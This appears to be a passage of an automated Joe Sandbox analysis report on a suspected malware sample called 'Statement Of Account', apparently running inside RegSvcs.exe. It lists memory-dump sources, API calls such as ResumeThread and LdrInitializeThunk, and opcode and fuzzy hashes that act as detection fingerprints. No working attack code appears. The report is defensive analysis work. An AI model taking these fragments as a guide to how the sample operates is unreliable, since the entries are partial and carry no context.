• Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ResumeThread.KERNEL32(EC8B5505), ref: 07A2BD72
Memory Dump Source
• Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 014AB0E6
Memory Dump Source
• Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1700201145.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_116d000_Statement Of Account.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1700267326.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_117d000_Statement Of Account.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1700267326.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_117d000_Statement Of Account.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1700201145.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_116d000_Statement Of Account.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1700201145.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_116d000_Statement Of Account.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1700201145.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_116d000_Statement Of Account.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
Similarity
• API ID:
• String ID: T+-q$[V~*$]\`
• API String ID: 0-3978741314
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage: 0%
                                                                                            Dynamic/Decrypted Code Coverage: 100%
                                                                                            Signature Coverage: 40%
                                                                                            Total number of Nodes: 5
                                                                                            Total number of Limit Nodes: 1
                                                                                            execution_graph: nodes 85117 (fb2ad0, LdrInitializeThunk), 85122 (fb2c00), 85124 (fb2c0a), 85125 (fb2c1f, LdrInitializeThunk), 85126 (fb2c11); edges 85122->85124, 85124->85125, 85124->85126

                                                                                            Control-flow Graph

                                                                                            Legend: Executed / Not Executed
                                                                                            control_flow_graph node 4: fb2ad0-fb2adc LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            Legend: Executed / Not Executed
                                                                                            control_flow_graph node 6: fb2bf0-fb2bfc LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            Legend: Executed / Not Executed
                                                                                            control_flow_graph node 5: fb2b60-fb2b6c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            Legend: Executed / Not Executed
                                                                                            control_flow_graph node 8: fb2ca0-fb2cac LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 7 fb2c70-fb2c7c LdrInitializeThunk
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 12 fb2df0-fb2dfc LdrInitializeThunk
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 11 fb2dd0-fb2ddc LdrInitializeThunk
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 10 fb2d30-fb2d3c LdrInitializeThunk
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 9 fb2d10-fb2d1c LdrInitializeThunk
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 14 fb2ea0-fb2eac LdrInitializeThunk
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 13 fb2e80-fb2e8c LdrInitializeThunk
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 17 fb2fb0-fb2fbc LdrInitializeThunk
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 16 fb2f90-fb2f9c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: d5a7e83e8dcedc0a8b82cbd8dde6e356f6a47672cd524ccfe2448ebcdec3f9d2
                                                                                            • Instruction ID: dd002c79d4735544dec29bd3f31651e2c12004ed7fcd99c37914abb055e96413
                                                                                            • Opcode Fuzzy Hash: d5a7e83e8dcedc0a8b82cbd8dde6e356f6a47672cd524ccfe2448ebcdec3f9d2
                                                                                            • Instruction Fuzzy Hash: 1290023120180512D20071598915B0B000587D0342F55C026A1164555E8A2A89527571
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 15 fb2f30-fb2f3c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 1ffce6adc88922f68b6a4987a6c6c1c26f3bd26ef401914b23c18133a94ae830
                                                                                            • Instruction ID: 65fa3055435cff3d52910b4497877c2f6e4c3b551711555708ffa396a622bbca
                                                                                            • Opcode Fuzzy Hash: 1ffce6adc88922f68b6a4987a6c6c1c26f3bd26ef401914b23c18133a94ae830
                                                                                            • Instruction Fuzzy Hash: E990026134140552D20071598515F060005C7E1341F55C02AE1064554E8A1ECD537126
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 fb2c0a-fb2c0f 1 fb2c1f-fb2c26 LdrInitializeThunk 0->1 2 fb2c11-fb2c18 0->2
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e57106ef2f184f3785d77388ccedf33099499218afcf82acf602713834556214
                                                                                            • Instruction ID: 4197e17a98aac88052eed55bc4bf83f98d9f911cf9d010573d113f9e9389cfa8
                                                                                            • Opcode Fuzzy Hash: e57106ef2f184f3785d77388ccedf33099499218afcf82acf602713834556214
                                                                                            • Instruction Fuzzy Hash: 0BB09B71D015C5D5DB51E7614709B1B7E0067D0751F15C076D2030641F473DC5D1F575
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1772637211.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_41f000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6b9f8b07fea5db4bbec7f5d26f0e2d27b443d0e5888b6a4560a2a3835bf231a7
                                                                                            • Instruction ID: bf268d91f619938eb03b39c7895fca664e884f2412e91478f794490b2a2455dc
                                                                                            • Opcode Fuzzy Hash: 6b9f8b07fea5db4bbec7f5d26f0e2d27b443d0e5888b6a4560a2a3835bf231a7
                                                                                            • Instruction Fuzzy Hash: 71A022A8C0830C03002030FA2A03023B38CC000008F0003EAAE8C022023C02AC3200EB
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                            • API String ID: 0-2515994595
                                                                                            • Opcode ID: e2dec7c154d33ce43950d6485f76ed2299b02eed4bf689700b1f3c86e29ca4b8
                                                                                            • Instruction ID: 5d926383a66821f7e0ca0be58bbabc68d1ae04c9fec2147390201a9738e23b6b
                                                                                            • Opcode Fuzzy Hash: e2dec7c154d33ce43950d6485f76ed2299b02eed4bf689700b1f3c86e29ca4b8
                                                                                            • Instruction Fuzzy Hash: 1B51D2B11083059BD325EF188848BABBBE8FF84340F54891EF998C3249E778D604DBD2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • LdrpCheckRedirection, xrefs: 00FF488F
                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FF4888
                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 00FF4899
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                            • API String ID: 3446177414-3154609507
                                                                                            • Opcode ID: bbd81c3216fe1044e919ba58e8902f73dc27d5c2de01d82c60d3d1d42e43e449
                                                                                            • Instruction ID: e78b934b9b25f95f0c9d77db55ce5783d846bbb5e4d062218d2352aec2ae016a
                                                                                            • Opcode Fuzzy Hash: bbd81c3216fe1044e919ba58e8902f73dc27d5c2de01d82c60d3d1d42e43e449
                                                                                            • Instruction Fuzzy Hash: 26418E33A046589BCB21DE589840A377BE4BF49BA0F050669EE9897375E725FC00EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00FB2DF0: LdrInitializeThunk.NTDLL ref: 00FB2DFA
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0BA3
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0BB6
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0D60
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0D74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 1404860816-0
                                                                                            • Opcode ID: aa8e52f0e988b70ac905938740b47ab964df05582e0cd27657de6f4a1e288b37
                                                                                            • Instruction ID: 7fbda786996ad59fcdeec1c60e71d05c3ea2ef573041ed52af0fb56306318252
                                                                                            • Opcode Fuzzy Hash: aa8e52f0e988b70ac905938740b47ab964df05582e0cd27657de6f4a1e288b37
                                                                                            • Instruction Fuzzy Hash: A9425A729007159FDB60CF25C881BEAB7F5BF44310F1445A9E989EB242EB74EA84DF60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 5b5db074237ad4e288609328aaca4e5479398fa2da05f29b86628c3754c5de4a
                                                                                            • Instruction ID: e962b87347ac822dc2a433059c75ebb068587b65199511a0abfc30b28418ac5c
                                                                                            • Opcode Fuzzy Hash: 5b5db074237ad4e288609328aaca4e5479398fa2da05f29b86628c3754c5de4a
                                                                                            • Instruction Fuzzy Hash: 48F1F5B2E006118BDB58DF6DC9D167EFBF5AF8821071941BDD896DB381E634EA01CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
